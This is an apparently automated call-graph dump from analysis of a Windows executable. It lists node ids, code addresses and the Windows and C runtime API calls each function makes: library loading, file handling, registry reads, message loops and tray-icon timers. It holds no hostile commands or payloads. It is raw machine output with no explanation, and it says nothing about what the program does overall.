LoadLibraryExW 104449 a66607 LoadLibraryA 104273->104449 104277 aa564f 104275->104277 104279 a66607 3 API calls 104277->104279 104280 aa5657 104279->104280 104470 a6684a 104280->104470 104281 a666ce 104281->104280 104282 a666da 104281->104282 104284 a666e7 68 API calls 104282->104284 104286 a662fa 104284->104286 104286->104233 104286->104234 104288 aa567e 104290 a63b62 104289->104290 104291 aa415f 104289->104291 104293 a8017b 8 API calls 104290->104293 104730 aca215 81 API calls __wsopen_s 104291->104730 104294 a63b86 104293->104294 104295 a67aab CloseHandle 104294->104295 104296 a63b94 104295->104296 104298 a63bfa 104301 a6bf73 8 API calls 104298->104301 104299 a63bec 104299->104298 104302 aa4179 104299->104302 104731 acd5aa SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 104299->104731 104302->104298 104302->104299 104393 ad36d4 104392->104393 104394 a66874 64 API calls 104393->104394 104395 ad36e8 104394->104395 104749 ad3827 104395->104749 104398 a6684a 40 API calls 104412 ad3700 104437->104248 104442 a66656 GetProcAddress 104441->104442 104443 a66674 104441->104443 104444 a66666 104442->104444 104446 a8e95b 104443->104446 104444->104443 104445 a6666d FreeLibrary 104444->104445 104445->104443 104478 a8e89a 104446->104478 104448 a66698 104448->104272 104448->104273 104450 a6661c GetProcAddress 104449->104450 104451 a6663b 104449->104451 104452 a6662c 104450->104452 104454 a66720 104451->104454 104452->104451 104453 a66634 FreeLibrary 104452->104453 104453->104451 104455 a8017b 8 API calls 104454->104455 104456 a66735 104455->104456 104457 a6423c 8 API calls 104456->104457 104458 a66741 __fread_nolock 104457->104458 104459 aa56c2 104458->104459 104463 a6677c 104458->104463 104543 ad3a0e CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 104458->104543 104544 ad3a92 74 API calls 104459->104544 104462 a6684a 40 API calls 104462->104463 104463->104462 104464 aa5706 104463->104464 104465 a66874 64 API calls 104463->104465 104467 a66810 ISource 104463->104467 104538 a66874 104464->104538 104465->104463 104467->104281 104469 a6684a 40 API calls 104469->104467 104471 aa5760 104470->104471 104472 a6685c 104470->104472 104576 a8ec34 104472->104576 104475 ad32bd 104685 ad310d 104475->104685 104477 ad32d8 104477->104288 104481 a8e8a6 CallCatchBlock 104478->104481 104479 a8e8b4 104503 a8f649 20 API calls _abort 104479->104503 104481->104479 104483 a8e8e4 104481->104483 104482 a8e8b9 104504 a92b5c 26 API calls __wsopen_s 104482->104504 104485 a8e8e9 104483->104485 104486 a8e8f6 104483->104486 104505 a8f649 20 API calls _abort 104485->104505 104495 a983e1 104486->104495 104489 a8e8ff 104490 a8e912 104489->104490 104491 a8e905 104489->104491 104507 a8e944 LeaveCriticalSection __fread_nolock 104490->104507 104506 a8f649 20 API calls _abort 104491->104506 104493 a8e8c4 __wsopen_s 104493->104448 104496 a983ed CallCatchBlock 104495->104496 104508 a932d1 EnterCriticalSection 104496->104508 104498 a983fb 104509 a9847b 104498->104509 104502 a9842c __wsopen_s 104502->104489 104503->104482 104504->104493 104505->104493 104506->104493 104507->104493 104508->104498 104518 a9849e 104509->104518 104510 a984f7 104528 a94ff0 20 API calls 2 library calls 104510->104528 104512 a98500 104529 a92d38 104512->104529 104515 a98509 104517 a98408 104515->104517 104535 a93778 11 API calls 2 library calls 104515->104535 104523 a98437 104517->104523 104518->104510 104518->104517 104526 a894fd EnterCriticalSection 104518->104526 104527 a89511 LeaveCriticalSection 104518->104527 104519 a98528 104536 a894fd EnterCriticalSection 104519->104536 104522 a9853b 104522->104517 104537 a93319 LeaveCriticalSection 104523->104537 104525 a9843e 104525->104502 104526->104518 104527->104518 104528->104512 104530 a92d6c __dosmaperr 104529->104530 104531 a92d43 RtlFreeHeap 104529->104531 104530->104515 104531->104530 104532 a92d58 104531->104532 104533 a8f649 __dosmaperr 18 API calls 104532->104533 104534 a92d5e GetLastError 104533->104534 104534->104530 104535->104519 104536->104522 104537->104525 104539 a66883 104538->104539 104540 aa5780 104538->104540 104545 a8f053 104539->104545 104543->104459 104544->104463 104548 a8ee1a 104545->104548 104547 a66891 104547->104469 104552 a8ee26 CallCatchBlock 104548->104552 104549 a8ee32 104573 a8f649 20 API calls _abort 104549->104573 104551 a8ee58 104561 a894fd EnterCriticalSection 104551->104561 104552->104549 104552->104551 104553 a8ee37 104574 a92b5c 26 API calls __wsopen_s 104553->104574 104556 a8ee64 104562 a8ef7a 104556->104562 104558 a8ee78 104559 a8ee42 __wsopen_s 104559->104547 104561->104556 104563 a8ef9c 104562->104563 104564 a8ef8c 104562->104564 104565 a8eea1 28 API calls 104563->104565 104566 a8f649 __dosmaperr 20 API calls 104564->104566 104569 a8efbf 104565->104569 104567 a8ef91 104566->104567 104567->104558 104568 a8f03e 104568->104558 104569->104568 104570 a8df7b 62 API calls 104569->104570 104573->104553 104574->104559 104579 a8ec51 104576->104579 104578 a6686d 104578->104475 104580 a8ec5d CallCatchBlock 104579->104580 104581 a8ec9d 104580->104581 104582 a8ec95 __wsopen_s 104580->104582 104587 a8ec70 ___scrt_fastfail 104580->104587 104592 a894fd EnterCriticalSection 104581->104592 104582->104578 104584 a8eca7 104593 a8ea68 104584->104593 104606 a8f649 20 API calls _abort 104587->104606 104588 a8ec8a 104607 a92b5c 26 API calls __wsopen_s 104588->104607 104592->104584 104597 a8ea7a ___scrt_fastfail 104593->104597 104599 a8ea97 104593->104599 104594 a8ea87 104681 a8f649 20 API calls _abort 104594->104681 104596 a8ea8c 104682 a92b5c 26 API calls __wsopen_s 104596->104682 104597->104594 104597->104599 104601 a8eada __fread_nolock 104597->104601 104608 a8ecdc LeaveCriticalSection __fread_nolock 104599->104608 104600 a8ebf6 ___scrt_fastfail 104684 a8f649 20 API calls _abort 104600->104684 104601->104599 104601->104600 104609 a8dcc5 104601->104609 104616 a990c5 104601->104616 104683 a8d2e8 26 API calls 4 library calls 104601->104683 104606->104588 104607->104582 104608->104582 104610 a8dcd1 104609->104610 104611 a8dce6 104609->104611 104612 a8f649 __dosmaperr 20 API calls 104610->104612 104611->104601 104613 a8dcd6 104612->104613 104614 a92b5c __wsopen_s 26 API calls 104613->104614 104615 a8dce1 104614->104615 104615->104601 104617 a990ef 104616->104617 104618 a990d7 104616->104618 104620 a99459 104617->104620 104625 a99134 104617->104625 104619 a8f636 __dosmaperr 20 API calls 104618->104619 104621 a990dc 104619->104621 104622 a8f636 __dosmaperr 20 API calls 104620->104622 104623 a8f649 __dosmaperr 20 API calls 104621->104623 104624 a9945e 104622->104624 104626 a990e4 104623->104626 104627 a8f649 __dosmaperr 20 API calls 104624->104627 104625->104626 104628 a9913f 104625->104628 104632 a9916f 104625->104632 104626->104601 104629 a9914c 104627->104629 104630 a8f636 __dosmaperr 20 API calls 104628->104630 104631 a99144 104630->104631 104634 a8f649 __dosmaperr 20 API calls 104631->104634 104635 a99188 104632->104635 104636 a991ca 104632->104636 104637 a991ae 104632->104637 104634->104629 104635->104637 104670 a99195 104635->104670 104639 a93b93 _strftime 21 API calls 104636->104639 104638 a8f636 __dosmaperr 20 API calls 104637->104638 104640 a991b3 104638->104640 104641 a991e1 104639->104641 104643 a8f649 __dosmaperr 20 API calls 104640->104643 104644 a92d38 _free 20 API calls 104641->104644 104642 a9fc1b __fread_nolock 26 API calls 104645 a99333 104642->104645 104670->104642 104681->104596 104682->104599 104683->104601 104684->104596 104688 a8e858 104685->104688 104687 ad311c 104687->104477 104691 a8e7d9 104688->104691 104690 a8e875 104690->104687 104692 a8e7e8 104691->104692 104693 a8e7fc 104691->104693 104699 a8f649 20 API calls _abort 104692->104699 104698 a8e7f8 __alldvrm 104693->104698 104701 a936b2 11 API calls 2 library calls 104693->104701 104695 a8e7ed 104700 a92b5c 26 API calls __wsopen_s 104695->104700 104698->104690 104699->104695 104700->104698 104701->104698 104730->104299 104751 ad383b 104749->104751 104750 a6684a 40 API calls 104750->104751 104751->104750 104752 ad32bd 27 API calls 104751->104752 104753 ad36fc 104751->104753 104754 a66874 64 API calls 104751->104754 104752->104751 104753->104398 104753->104412 104754->104751 104851->104159 104852 ab400f 104868 a6eeb0 ISource 104852->104868 104853 a6f211 PeekMessageW 104853->104868 104854 a6ef07 GetInputState 104854->104853 104854->104868 104855 a6f0d5 104856 ab32cd TranslateAcceleratorW 104856->104868 104858 a6f28f PeekMessageW 104858->104868 104859 a6f104 timeGetTime 104859->104868 104860 a6f273 TranslateMessage DispatchMessageW 104860->104858 104861 a6f2af Sleep 104878 a6f2c0 104861->104878 104862 ab4183 Sleep 104862->104878 104863 ab33e9 timeGetTime 104919 a7aa65 9 API calls 104863->104919 104864 a7f215 timeGetTime 104864->104878 104865 acdd87 46 API calls 104865->104878 104867 ab421a GetExitCodeProcess 104871 ab4230 WaitForSingleObject 104867->104871 104872 ab4246 CloseHandle 104867->104872 104868->104853 104868->104854 104868->104855 104868->104856 104868->104858 104868->104859 104868->104860 104868->104861 104868->104862 104868->104863 104881 a70340 207 API calls 104868->104881 104882 a72b20 207 API calls 104868->104882 104884 a6f450 104868->104884 104891 a6f6d0 104868->104891 104914 a7e915 104868->104914 104920 ad446f 8 API calls 104868->104920 104921 ad3fe1 81 API calls __wsopen_s 104868->104921 104869 ab3d51 104874 ab3d59 104869->104874 104870 af345b GetForegroundWindow 104870->104878 104871->104868 104871->104872 104872->104878 104875 ab42b8 Sleep 104875->104868 104878->104864 104878->104865 104878->104867 104878->104868 104878->104869 104878->104870 104878->104875 104922 ae60b5 8 API calls 104878->104922 104923 acf292 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 104878->104923 104881->104868 104882->104868 104885 a6f483 104884->104885 104886 a6f46f 104884->104886 104956 ad3fe1 81 API calls __wsopen_s 104885->104956 104924 a6e960 104886->104924 104889 a6f47a 104889->104868 104890 ab4584 104890->104890 104892 a6f710 104891->104892 104908 a6f7dc ISource 104892->104908 104973 a805b2 5 API calls __Init_thread_wait 104892->104973 104895 ab45d9 104897 a6bf73 8 API calls 104895->104897 104895->104908 104896 a6bf73 8 API calls 104896->104908 104898 ab45f3 104897->104898 104974 a80413 29 API calls __onexit 104898->104974 104899 a6be2d 39 API calls 104899->104908 104902 ab45fd 104975 a80568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 104902->104975 104905 ad3fe1 81 API calls 104905->104908 104907 a70340 207 API calls 104907->104908 104908->104896 104908->104899 104908->104905 104908->104907 104909 a6bed9 8 API calls 104908->104909 104910 a6fae1 104908->104910 104911 a71ca0 8 API calls 104908->104911 104972 a7b35c 207 API calls 104908->104972 104976 a805b2 5 API calls __Init_thread_wait 104908->104976 104977 a80413 29 API calls __onexit 104908->104977 104978 a80568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 104908->104978 104979 ae5231 101 API calls 104908->104979 104980 ae731e 207 API calls 104908->104980 104909->104908 104910->104868 104911->104908 104915 a7e959 104914->104915 104916 a7e928 104914->104916 104915->104868 104916->104915 104917 a7e94c IsDialogMessageW 104916->104917 104918 abeff6 GetClassLongW 104916->104918 104917->104915 104917->104916 104918->104916 104918->104917 104919->104868 104920->104868 104921->104868 104922->104878 104923->104878 104925 a70340 207 API calls 104924->104925 104942 a6e99d 104925->104942 104926 ab31d3 104970 ad3fe1 81 API calls __wsopen_s 104926->104970 104928 a6ea0b ISource 104928->104889 104929 a6edd5 104929->104928 104940 a8017b 8 API calls 104929->104940 104930 a6eac3 104930->104929 104932 a6eace 104930->104932 104931 a6ecff 104934 a6ed14 104931->104934 104935 ab31c4 104931->104935 104933 a8014b 8 API calls 104932->104933 104944 a6ead5 __fread_nolock 104933->104944 104937 a8014b 8 API calls 104934->104937 104969 ae6162 8 API calls 104935->104969 104936 a6ebb8 104941 a8017b 8 API calls 104936->104941 104948 a6eb6a 104937->104948 104939 a8014b 8 API calls 104939->104942 104940->104944 104951 a6eb29 ISource __fread_nolock 104941->104951 104942->104926 104942->104928 104942->104929 104942->104930 104942->104936 104942->104939 104942->104951 104943 a8014b 8 API calls 104945 a6eaf6 104943->104945 104944->104943 104944->104945 104945->104951 104957 a6d260 104945->104957 104947 ab31b3 104968 ad3fe1 81 API calls __wsopen_s 104947->104968 104948->104889 104951->104931 104951->104947 104951->104948 104952 ab318e 104951->104952 104954 ab316c 104951->104954 104965 a644fe 207 API calls 104951->104965 104967 ad3fe1 81 API calls __wsopen_s 104952->104967 104966 ad3fe1 81 API calls __wsopen_s 104954->104966 104956->104890 104958 a6d2c6 104957->104958 104959 a6d29a 104957->104959 104961 a70340 207 API calls 104958->104961 104960 a6f6d0 207 API calls 104959->104960 104962 a6d2a0 104959->104962 104960->104962 104963 ab184b 104961->104963 104962->104951 104963->104962 104971 ad3fe1 81 API calls __wsopen_s 104963->104971 104965->104951 104966->104948 104967->104948 104968->104948 104969->104926 104970->104928 104971->104962 104972->104908 104973->104895 104974->104902 104975->104908 104976->104908 104977->104908 104978->104908 104979->104908 104980->104908 104981 ab65af 104982 a8014b 8 API calls 104981->104982 104983 ab65b6 104982->104983 104987 acfafb 104983->104987 104985 ab65c2 104986 acfafb 8 API calls 104985->104986 104986->104985 104989 acfb1b 104987->104989 104988 acfbe4 104988->104985 104989->104988 104990 a8017b 8 API calls 104989->104990 104991 acfb57 104990->104991 104992 acfb79 104991->104992 104995 acfbed 8 API calls 104991->104995 104992->104988 104994 a6bed9 8 API calls 104992->104994 104994->104992 104995->104991 104996 a6f4c0 104999 a7a025 104996->104999 104998 a6f4cc 105000 a7a046 104999->105000 105005 a7a0a3 104999->105005 105002 a70340 207 API calls 105000->105002 105000->105005 105006 a7a077 105002->105006 105003 ab806b 105003->105003 105004 a7a0e7 105004->104998 105005->105004 105008 ad3fe1 81 API calls __wsopen_s 105005->105008 105006->105004 105006->105005 105007 a6bed9 8 API calls 105006->105007 105007->105005 105008->105003 105009 a8f06e 105010 a8f07a CallCatchBlock 105009->105010 105011 a8f09b 105010->105011 105012 a8f086 105010->105012 105022 a894fd EnterCriticalSection 105011->105022 105028 a8f649 20 API calls _abort 105012->105028 105015 a8f08b 105029 a92b5c 26 API calls __wsopen_s 105015->105029 105016 a8f0a7 105023 a8f0db 105016->105023 105019 a8f096 __wsopen_s 105022->105016 105031 a8f106 105023->105031 105025 a8f0e8 105026 a8f0b4 105025->105026 105051 a8f649 20 API calls _abort 105025->105051 105030 a8f0d1 LeaveCriticalSection __fread_nolock 105026->105030 105028->105015 105029->105019 105030->105019 105032 a8f12e 105031->105032 105033 a8f114 105031->105033 105034 a8dcc5 __fread_nolock 26 API calls 105032->105034 105055 a8f649 20 API calls _abort 105033->105055 105036 a8f137 105034->105036 105052 a99789 105036->105052 105037 a8f119 105056 a92b5c 26 API calls __wsopen_s 105037->105056 105041 a8f23b 105043 a8f248 105041->105043 105046 a8f1ee 105041->105046 105042 a8f1bf 105045 a8f1dc 105042->105045 105042->105046 105058 a8f649 20 API calls _abort 105043->105058 105057 a8f41f 31 API calls 4 library calls 105045->105057 105048 a8f124 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 105046->105048 105059 a8f29b 30 API calls 2 library calls 105046->105059 105048->105025 105049 a8f1e6 105049->105048 105051->105026 105060 a99606 105052->105060 105054 a8f153 105054->105041 105054->105042 105054->105048 105055->105037 105056->105048 105057->105049 105058->105048 105059->105048 105061 a99612 CallCatchBlock 105060->105061 105062 a9961a 105061->105062 105064 a99632 105061->105064 105095 a8f636 20 API calls _abort 105062->105095 105065 a996e6 105064->105065 105069 a9966a 105064->105069 105100 a8f636 20 API calls _abort 105065->105100 105066 a9961f 105096 a8f649 20 API calls _abort 105066->105096 105085 a954ba EnterCriticalSection 105069->105085 105070 a996eb 105101 a8f649 20 API calls _abort 105070->105101 105073 a99670 105075 a996a9 105073->105075 105076 a99694 105073->105076 105074 a996f3 105102 a92b5c 26 API calls __wsopen_s 105074->105102 105086 a9970b 105075->105086 105097 a8f649 20 API calls _abort 105076->105097 105080 a996a4 105099 a996de LeaveCriticalSection __wsopen_s 105080->105099 105081 a99699 105098 a8f636 20 API calls _abort 105081->105098 105084 a99627 __wsopen_s 105084->105054 105085->105073 105103 a95737 105086->105103 105088 a9971d 105089 a99725 105088->105089 105090 a99736 SetFilePointerEx 105088->105090 105116 a8f649 20 API calls _abort 105089->105116 105092 a9972a 105090->105092 105093 a9974e GetLastError 105090->105093 105092->105080 105117 a8f613 20 API calls __dosmaperr 105093->105117 105095->105066 105096->105084 105097->105081 105098->105080 105099->105084 105100->105070 105101->105074 105102->105084 105104 a95759 105103->105104 105105 a95744 105103->105105 105109 a9577e 105104->105109 105120 a8f636 20 API calls _abort 105104->105120 105118 a8f636 20 API calls _abort 105105->105118 105108 a95749 105119 a8f649 20 API calls _abort 105108->105119 105109->105088 105110 a95789 105121 a8f649 20 API calls _abort 105110->105121 105113 a95751 105113->105088 105114 a95791 105122 a92b5c 26 API calls __wsopen_s 105114->105122 105116->105092 105117->105092 105118->105108 105119->105113 105120->105110 105121->105114 105122->105113 105123 a98782 105128 a9853e 105123->105128 105126 a987aa 105133 a9856f try_get_first_available_module 105128->105133 105130 a9876e 105147 a92b5c 26 API calls __wsopen_s 105130->105147 105132 a986c3 105132->105126 105140 aa0d04 105132->105140 105139 a986b8 105133->105139 105143 a8917b 40 API calls 2 library calls 105133->105143 105135 a9870c 105135->105139 105144 a8917b 40 API calls 2 library calls 105135->105144 105137 a9872b 105137->105139 105145 a8917b 40 API calls 2 library calls 105137->105145 105139->105132 105146 a8f649 20 API calls _abort 105139->105146 105148 aa0401 105140->105148 105142 aa0d1f 105142->105126 105143->105135 105144->105137 105145->105139 105146->105130 105147->105132 105151 aa040d CallCatchBlock 105148->105151 105149 aa041b 105206 a8f649 20 API calls _abort 105149->105206 105151->105149 105153 aa0454 105151->105153 105152 aa0420 105207 a92b5c 26 API calls __wsopen_s 105152->105207 105159 aa09db 105153->105159 105158 aa042a __wsopen_s 105158->105142 105209 aa07af 105159->105209 105162 aa0a0d 105241 a8f636 20 API calls _abort 105162->105241 105163 aa0a26 105227 a95594 105163->105227 105166 aa0a2b 105167 aa0a4b 105166->105167 105168 aa0a34 105166->105168 105240 aa071a CreateFileW 105167->105240 105243 a8f636 20 API calls _abort 105168->105243 105172 aa0a84 105174 aa0b01 GetFileType 105172->105174 105176 aa0ad6 GetLastError 105172->105176 105245 aa071a CreateFileW 105172->105245 105173 aa0a39 105244 a8f649 20 API calls _abort 105173->105244 105177 aa0b0c GetLastError 105174->105177 105178 aa0b53 105174->105178 105246 a8f613 20 API calls __dosmaperr 105176->105246 105247 a8f613 20 API calls __dosmaperr 105177->105247 105249 a954dd 21 API calls 2 library calls 105178->105249 105179 aa0a12 105242 a8f649 20 API calls _abort 105179->105242 105183 aa0b1a CloseHandle 105183->105179 105186 aa0b43 105183->105186 105185 aa0ac9 105185->105174 105185->105176 105248 a8f649 20 API calls _abort 105186->105248 105187 aa0b74 105190 aa0bc0 105187->105190 105250 aa092b 72 API calls 3 library calls 105187->105250 105189 aa0b48 105189->105179 105194 aa0bed 105190->105194 105251 aa04cd 72 API calls 4 library calls 105190->105251 105193 aa0be6 105193->105194 105195 aa0bfe 105193->105195 105252 a98a2e 105194->105252 105197 aa0478 105195->105197 105198 aa0c7c CloseHandle 105195->105198 105208 aa04a1 LeaveCriticalSection __wsopen_s 105197->105208 105267 aa071a CreateFileW 105198->105267 105200 aa0ca7 105201 aa0cdd 105200->105201 105202 aa0cb1 GetLastError 105200->105202 105201->105197 105268 a8f613 20 API calls __dosmaperr 105202->105268 105204 aa0cbd 105269 a956a6 21 API calls 2 library calls 105204->105269 105206->105152 105207->105158 105208->105158 105210 aa07d0 105209->105210 105211 aa07ea 105209->105211 105210->105211 105277 a8f649 20 API calls _abort 105210->105277 105270 aa073f 105211->105270 105214 aa07df 105278 a92b5c 26 API calls __wsopen_s 105214->105278 105216 aa0822 105217 aa0851 105216->105217 105279 a8f649 20 API calls _abort 105216->105279 105224 aa08a4 105217->105224 105281 a8da7d 26 API calls 2 library calls 105217->105281 105220 aa089f 105222 aa091e 105220->105222 105220->105224 105221 aa0846 105280 a92b5c 26 API calls __wsopen_s 105221->105280 105282 a92b6c 11 API calls _abort 105222->105282 105224->105162 105224->105163 105226 aa092a 105228 a955a0 CallCatchBlock 105227->105228 105285 a932d1 EnterCriticalSection 105228->105285 105230 a955a7 105231 a955cc 105230->105231 105234 a9563a EnterCriticalSection 105230->105234 105237 a955ee 105230->105237 105289 a95373 21 API calls 3 library calls 105231->105289 105234->105237 105238 a95647 LeaveCriticalSection 105234->105238 105235 a955d1 105235->105237 105290 a954ba EnterCriticalSection 105235->105290 105236 a95617 __wsopen_s 105236->105166 105286 a9569d 105237->105286 105238->105230 105240->105172 105241->105179 105242->105197 105243->105173 105244->105179 105245->105185 105246->105179 105247->105183 105248->105189 105249->105187 105250->105190 105251->105193 105253 a95737 __wsopen_s 26 API calls 105252->105253 105256 a98a3e 105253->105256 105254 a98a44 105292 a956a6 21 API calls 2 library calls 105254->105292 105256->105254 105258 a95737 __wsopen_s 26 API calls 105256->105258 105266 a98a76 105256->105266 105257 a95737 __wsopen_s 26 API calls 105259 a98a82 CloseHandle 105257->105259 105262 a98a6d 105258->105262 105259->105254 105263 a98a8e GetLastError 105259->105263 105260 a98a9c 105261 a98abe 105260->105261 105293 a8f613 20 API calls __dosmaperr 105260->105293 105261->105197 105265 a95737 __wsopen_s 26 API calls 105262->105265 105263->105254 105265->105266 105266->105254 105266->105257 105267->105200 105268->105204 105269->105201 105272 aa0757 105270->105272 105271 aa0772 105271->105216 105272->105271 105283 a8f649 20 API calls _abort 105272->105283 105274 aa0796 105284 a92b5c 26 API calls __wsopen_s 105274->105284 105276 aa07a1 105276->105216 105277->105214 105278->105211 105279->105221 105280->105217 105281->105220 105282->105226 105283->105274 105284->105276 105285->105230 105291 a93319 LeaveCriticalSection 105286->105291 105288 a956a4 105288->105236 105289->105235 105290->105237 105291->105288 105292->105260 105293->105261 105294 ab1ac5 105295 ab1acd 105294->105295 105298 a6d535 105294->105298 105340 ac7a87 8 API calls __fread_nolock 105295->105340 105297 ab1adf 105341 ac7a00 8 API calls __fread_nolock 105297->105341 105301 a8014b 8 API calls 105298->105301 105300 ab1b09 105302 a70340 207 API calls 105300->105302 105303 a6d589 105301->105303 105304 ab1b30 105302->105304 105324 a6c32d 105303->105324 105305 ab1b44 105304->105305 105342 ae61a2 53 API calls _wcslen 105304->105342 105309 a8014b 8 API calls 105316 a6d66e ISource 105309->105316 105310 ab1b61 105310->105298 105343 ac7a87 8 API calls __fread_nolock 105310->105343 105315 ab1f79 105345 ac56ae 8 API calls ISource 105315->105345 105316->105315 105318 ab1f94 105316->105318 105319 a6bed9 8 API calls 105316->105319 105320 a6c3ab 8 API calls 105316->105320 105321 a6d911 ISource 105316->105321 105344 a6b4c8 8 API calls 105316->105344 105319->105316 105320->105316 105322 a6d9ac ISource 105321->105322 105331 a6c3ab 105321->105331 105323 a6d9c3 105322->105323 105339 a7e30a 8 API calls ISource 105322->105339 105327 a6c33d 105324->105327 105325 a6c345 105325->105309 105326 a8014b 8 API calls 105326->105327 105327->105325 105327->105326 105328 a6bf73 8 API calls 105327->105328 105329 a6bed9 8 API calls 105327->105329 105330 a6c32d 8 API calls 105327->105330 105328->105327 105329->105327 105330->105327 105332 a6c3b9 105331->105332 105338 a6c3e1 ISource 105331->105338 105333 a6c3c7 105332->105333 105334 a6c3ab 8 API calls 105332->105334 105335 a6c3cd 105333->105335 105336 a6c3ab 8 API calls 105333->105336 105334->105333 105335->105338 105346 a6c7e0 8 API calls ISource 105335->105346 105336->105335 105338->105322 105339->105322 105340->105297 105341->105300 105342->105310 105343->105310 105344->105316 105345->105318 105346->105338 105347 a636f5 105350 a6370f 105347->105350 105351 a63726 105350->105351 105352 a6378a 105351->105352 105353 a6372b 105351->105353 105389 a63788 105351->105389 105355 a63790 105352->105355 105356 aa3df4 105352->105356 105357 a63804 PostQuitMessage 105353->105357 105358 a63738 105353->105358 105354 a6376f DefWindowProcW 105379 a63709 105354->105379 105362 a63797 105355->105362 105363 a637bc SetTimer RegisterWindowMessageW 105355->105363 105405 a62f92 10 API calls 105356->105405 105357->105379 105359 a63743 105358->105359 105360 aa3e61 105358->105360 105364 a6380e 105359->105364 105365 a6374d 105359->105365 105408 acc8f7 65 API calls ___scrt_fastfail 105360->105408 105369 a637a0 KillTimer 105362->105369 105370 aa3d95 105362->105370 105366 a637e5 CreatePopupMenu 105363->105366 105363->105379 105395 a7fcad 105364->105395 105371 a63758 105365->105371 105383 aa3e46 105365->105383 105366->105379 105368 aa3e15 105406 a7f23c 40 API calls 105368->105406 105377 a63907 Shell_NotifyIconW 105369->105377 105375 aa3d9a 105370->105375 105376 aa3dd0 MoveWindow 105370->105376 105378 a637f2 105371->105378 105385 a63763 105371->105385 105372 aa3e73 105372->105354 105372->105379 105380 aa3dbf SetFocus 105375->105380 105381 aa3da0 105375->105381 105376->105379 105382 a637b3 105377->105382 105403 a6381f 75 API calls ___scrt_fastfail 105378->105403 105380->105379 105381->105385 105386 aa3da9 105381->105386 105402 a659ff DeleteObject DestroyWindow 105382->105402 105383->105354 105407 ac1423 8 API calls 105383->105407 105385->105354 105392 a63907 Shell_NotifyIconW 105385->105392 105404 a62f92 10 API calls 105386->105404 105389->105354 105390 a63802 105390->105379 105393 aa3e3a 105392->105393 105394 a6396b 60 API calls 105393->105394 105394->105389 105396 a7fcc5 ___scrt_fastfail 105395->105396 105397 a7fd4b 105395->105397 105398 a661a9 55 API calls 105396->105398 105397->105379 105400 a7fcec 105398->105400 105399 a7fd34 KillTimer SetTimer 105399->105397 105400->105399 105401 abfe2b Shell_NotifyIconW 105400->105401 105401->105399 105402->105379 105403->105390 105404->105379 105405->105368 105406->105385 105407->105389 105408->105372 105409 a9947a 105410 a99487 105409->105410 105414 a9949f 105409->105414 105459 a8f649 20 API calls _abort 105410->105459 105412 a9948c 105460 a92b5c 26 API calls __wsopen_s 105412->105460 105415 a99497 105414->105415 105416 a994fa 105414->105416 105461 aa0144 21 API calls 2 library calls 105414->105461 105418 a8dcc5 __fread_nolock 26 API calls 105416->105418 105419 a99512 105418->105419 105429 a98fb2 105419->105429 105421 a99519 105421->105415 105422 a8dcc5 __fread_nolock 26 API calls 105421->105422 105423 a99545 105422->105423 105423->105415 105424 a8dcc5 __fread_nolock 26 API calls 105423->105424 105425 a99553 105424->105425 105425->105415 105426 a8dcc5 __fread_nolock 26 API calls 105425->105426 105427 a99563 105426->105427 105428 a8dcc5 __fread_nolock 26 API calls 105427->105428 105428->105415 105430 a98fbe CallCatchBlock 105429->105430 105431 a98fde 105430->105431 105432 a98fc6 105430->105432 105434 a990a4 105431->105434 105438 a99017 105431->105438 105463 a8f636 20 API calls _abort 105432->105463 105470 a8f636 20 API calls _abort 105434->105470 105435 a98fcb 105464 a8f649 20 API calls _abort 105435->105464 105441 a9903b 105438->105441 105442 a99026 105438->105442 105439 a990a9 105471 a8f649 20 API calls _abort 105439->105471 105462 a954ba EnterCriticalSection 105441->105462 105465 a8f636 20 API calls _abort 105442->105465 105445 a99041 105449 a9905d 105445->105449 105450 a99072 105445->105450 105446 a99033 105472 a92b5c 26 API calls __wsopen_s 105446->105472 105447 a98fd3 __wsopen_s 105447->105421 105448 a9902b 105466 a8f649 20 API calls _abort 105448->105466 105467 a8f649 20 API calls _abort 105449->105467 105454 a990c5 __fread_nolock 38 API calls 105450->105454 105456 a9906d 105454->105456 105455 a99062 105468 a8f636 20 API calls _abort 105455->105468 105469 a9909c LeaveCriticalSection __wsopen_s 105456->105469 105459->105412 105460->105415 105461->105416 105462->105445 105463->105435 105464->105447 105465->105448 105466->105446 105467->105455 105468->105456 105469->105447 105470->105439 105471->105446 105472->105447 105473 a61033 105478 a668b4 105473->105478 105477 a61042 105479 a6bf73 8 API calls 105478->105479 105480 a66922 105479->105480 105486 a6589f 105480->105486 105482 a669bf 105484 a61038 105482->105484 105489 a66b14 8 API calls __fread_nolock 105482->105489 105485 a80413 29 API calls __onexit 105484->105485 105485->105477 105490 a658cb 105486->105490 105489->105482 105491 a658be 105490->105491 105492 a658d8 105490->105492 105491->105482 105492->105491 105493 a658df RegOpenKeyExW 105492->105493 105493->105491 105494 a658f9 RegQueryValueExW 105493->105494 105495 a6592f RegCloseKey 105494->105495 105496 a6591a 105494->105496 105495->105491 105496->105495 105497 a70ebf 105498 a70ed3 105497->105498 105503 a71425 105497->105503 105499 a70ee5 105498->105499 105500 a8014b 8 API calls 105498->105500 105501 ab562c 105499->105501 105504 a70f3e 105499->105504 105530 a6b4c8 8 API calls 105499->105530 105500->105499 105531 ad1b14 8 API calls 105501->105531 105503->105499 105507 a6bed9 8 API calls 105503->105507 105505 a72b20 207 API calls 105504->105505 105520 a7049d ISource 105504->105520 105529 a70376 ISource 105505->105529 105507->105499 105508 ab632b 105535 ad3fe1 81 API calls __wsopen_s 105508->105535 105509 a71e50 40 API calls 105509->105529 105511 a6bed9 8 API calls 105511->105529 105512 ab5cdb 105519 a6bed9 8 API calls 105512->105519 105512->105520 105513 a71695 105517 a6bed9 8 API calls 105513->105517 105513->105520 105514 ab625a 105534 ad3fe1 81 API calls __wsopen_s 105514->105534 105517->105520 105518 a71990 207 API calls 105518->105529 105519->105520 105521 a6bf73 8 API calls 105521->105529 105522 a80413 29 API calls pre_c_initialization 105522->105529 105523 a805b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 105523->105529 105524 a80568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 105524->105529 105525 ab6115 105532 ad3fe1 81 API calls __wsopen_s 105525->105532 105527 a8014b 8 API calls 105527->105529 105528 a70aae ISource 105533 ad3fe1 81 API calls __wsopen_s 105528->105533 